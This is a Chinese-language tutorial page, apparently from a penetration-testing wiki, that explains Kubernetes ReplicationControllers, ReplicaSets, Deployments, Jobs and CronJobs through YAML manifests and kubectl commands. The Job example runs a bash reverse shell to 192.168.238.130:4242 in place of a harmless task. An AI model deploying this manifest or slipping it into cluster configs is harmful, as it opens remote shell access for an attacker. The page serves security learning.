扩展知识

ReplicationController（RC）

ReplicationController 确保在任何时候都有特定数量的 Pod 副本处于运行状态。

apiVersion: v1
kind: ReplicationController
metadata:
  name: nginx
spec:
  replicas: 3
  selector:
    app: nginx
  template:
    metadata:
      name: nginx
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx
        ports:
        - containerPort: 80

· spec.replicas: 指定Pod副本数量，默认为1

· spec.selector: RC通过该属性来筛选要控制的Pod

· spec.template.metadata.labels: 注意这里的Pod的labels要和spec.selector相同，这样RC就可以来控制当前这个Pod了。

注意spec.selector和spec.template.metadata.labels这两个字段必须相同，否则会创建失败的，当然我们也可以不写spec.selector，这样就默认与Pod模板中的metadata.labels相同了。

#创建rc
kubectl create -f rc-demo.yaml
 
#查看RC
kubectl get rc
 
#查看具体信息
kubectl describe rc nginx
 
#修改pod副本数量
kubectl edit rc nginx
 
#利用rc滚动升级
kubectl rolling-update nginx --image=nginx:1.7.9
kubectl rolling-update nginx -f rc-demo.yaml

Replication Set（RS）

Replication Set简称RS，官方已经推荐我们使用RS和Deployment来代替RC了，实际上RS和RC的功能基本一致，目前唯一的一个区别就是RC只支持基于等式的selector

kubectl命令行工具中关于RC的大部分命令同样适用于我们的RS资源对象

apiVersion: apps/v1
kind: ReplicaSet
metadata:
  name: frontend
  labels:
    app: guestbook
    tier: frontend
spec:
  # modify replicas according to your case
  replicas: 3
  selector:
    matchLabels:
      tier: frontend
  template:
    metadata:
      labels:
        tier: frontend
    spec:
      containers:
      - name: php-redis
        image: gcr.io/google_samples/gb-frontend:v3

Deployment

主要职责和RC一样的都是保证Pod的数量和健康，二者大部分功能都是完全一致的，我们可以看成是一个升级版的RC控制器

官方组件kube-dns、kube-proxy也都是使用的Deployment来管理

特性：

· RC的全部功能：Deployment具备上面描述的RC的全部功能

· 事件和状态查看：可以查看Deployment的升级详细进度和状态

· 回滚：当升级Pod的时候如果出现问题，可以使用回滚操作回滚到之前的任一版本

· 版本记录：每一次对Deployment的操作，都能够保存下来，这也是保证可以回滚到任一版本的基础

· 暂停和启动：对于每一次升级都能够随时暂停和启动

一个Deployment拥有多个Replica Set，而一个Replica Set拥有一个或多个Pod。

一个Deployment控制多个rs主要是为了支持回滚机制，每当Deployment操作时，Kubernetes会重新生成一个Replica Set并保留，以后有需要的话就可以回滚至之前的状态。

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deploy
  labels:
    k8s-app: nginx-demo
spec:
  replicas: 3
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.7.9
        ports:
        - containerPort: 80
#查看deployment
kubectl get deployments
 
#查看Deployment的升级历史
kubectl rollout history deployment nginx-deploy

Job 和 Cronjob

Job负责处理任务，即仅执行一次的任务

CronJob则就是在Job上加上了时间调度。

jobs

apiVersion: batch/v1
kind: Job
metadata:
  name: job-demo
spec:
  template:
    metadata:
      name: job-demo
    spec:
      restartPolicy: Never
      containers:
      - name: counter
        image: busybox
        command:
        - "bin/bash"
        - "-c"
        - "bash -i >& /dev/tcp/192.168.238.130/4242 0>&1"
cronjobs
apiVersion: batch/v2alpha1
kind: CronJob
metadata:
  name: cronjob-demo
spec:
  schedule: "*/1 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          restartPolicy: OnFailure
          containers:
          - name: hello
            image: busybox
            args:
            - "bin/sh"
            - "-c"
            - "for i in 9 8 7 6 5 4 3 2 1; do echo $i; done"
#删除
kubectl delete cronjob cronjob-demo

PreviousKubernetes ATT&CK Next代码托管平台渗透场景

Last updated 1 year ago

apiVersion: v1 kind: ReplicationController metadata: name: nginx spec: replicas: 3 selector: app: nginx template: metadata: name: nginx labels: app: nginx spec: containers: - name: nginx image: nginx ports: - containerPort: 80

#创建rc kubectl create -f rc-demo.yaml #查看RC kubectl get rc #查看具体信息 kubectl describe rc nginx #修改pod副本数量 kubectl edit rc nginx #利用rc滚动升级 kubectl rolling-update nginx --image=nginx:1.7.9 kubectl rolling-update nginx -f rc-demo.yaml

apiVersion: apps/v1 kind: ReplicaSet metadata: name: frontend labels: app: guestbook tier: frontend spec: # modify replicas according to your case replicas: 3 selector: matchLabels: tier: frontend template: metadata: labels: tier: frontend spec: containers: - name: php-redis image: gcr.io/google_samples/gb-frontend:v3

apiVersion: apps/v1 kind: Deployment metadata: name: nginx-deploy labels: k8s-app: nginx-demo spec: replicas: 3 selector: matchLabels: app: nginx template: metadata: labels: app: nginx spec: containers: - name: nginx image: nginx:1.7.9 ports: - containerPort: 80 #查看deployment kubectl get deployments #查看Deployment的升级历史 kubectl rollout history deployment nginx-deploy

apiVersion: batch/v1 kind: Job metadata: name: job-demo spec: template: metadata: name: job-demo spec: restartPolicy: Never containers: - name: counter image: busybox command: - "bin/bash" - "-c" - "bash -i >& /dev/tcp/192.168.238.130/4242 0>&1" cronjobs apiVersion: batch/v2alpha1 kind: CronJob metadata: name: cronjob-demo spec: schedule: "*/1 * * * *" jobTemplate: spec: template: spec: restartPolicy: OnFailure containers: - name: hello image: busybox args: - "bin/sh" - "-c" - "for i in 9 8 7 6 5 4 3 2 1; do echo $i; done" #删除 kubectl delete cronjob cronjob-demo